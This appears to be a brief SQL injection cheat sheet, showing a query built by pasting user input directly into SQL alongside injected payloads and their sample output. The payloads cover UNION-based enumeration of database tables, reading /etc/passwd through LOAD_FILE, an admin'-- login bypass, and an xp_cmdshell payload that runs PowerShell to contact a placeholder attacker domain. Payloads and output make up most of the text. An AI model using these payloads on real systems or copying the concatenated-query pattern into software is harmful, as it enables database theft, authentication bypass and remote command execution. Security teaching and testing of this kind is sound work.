-
Retrieving schema objects
- Query that fetches posts
SELECT * FROM posts WHERE id = {user_input};
- Standard query
SELECT * FROM posts WHERE id = 1;
{ "id": 1, "title": "First Post", "content": "This is the content of the first post." }
- Manipulated query
SELECT * FROM posts WHERE id = 1 UNION SELECT null, table_name, null FROM information_schema.tables WHERE table_schema = 'database_name'
[ { "id": 1, "title": "First Post", "content": "This is the content of the first post." }, { "id": null, "table_name": "posts", "content": null }, { "id": null, "table_name": "user_information", "content": null } ]
- Query that fetches posts
-
Reading file from the file system
- Query that fetches posts
SELECT * FROM posts WHERE id = {user_input};
- Manipulating the query to read local files
SELECT * FROM posts WHERE id = 1 UNION SELECT null, LOAD_FILE('/etc/passwd'),null;
[ { "id": 1, "title": "First Post", "content": "This is the content of the first post." }, { "id": null, "title": "root:x:0:0:root:/root:/bin/bash\nuser:x:1000:1000:user:/home/user:/bin/bash\n...", "content": null } ]
- Query that fetches posts
- Login bypass
-
Query that validates credentials
SELECT * FROM users WHERE id = '{user_input_id}' AND password = '{user_input_password}';
-
Manipulated query
SELECT * FROM users WHERE id = 'admin'-- AND password = '1';
-
- OAST
- Query that fetches posts
SELECT * FROM posts WHERE id = {user_input};
- Manipulated query
SELECT * FROM posts WHERE id = 1; exec xp_cmdshell('powershell -Command "Invoke-WebRequest -Uri https://[ATTACKER-DOMAIN]/"');
- Query that fetches posts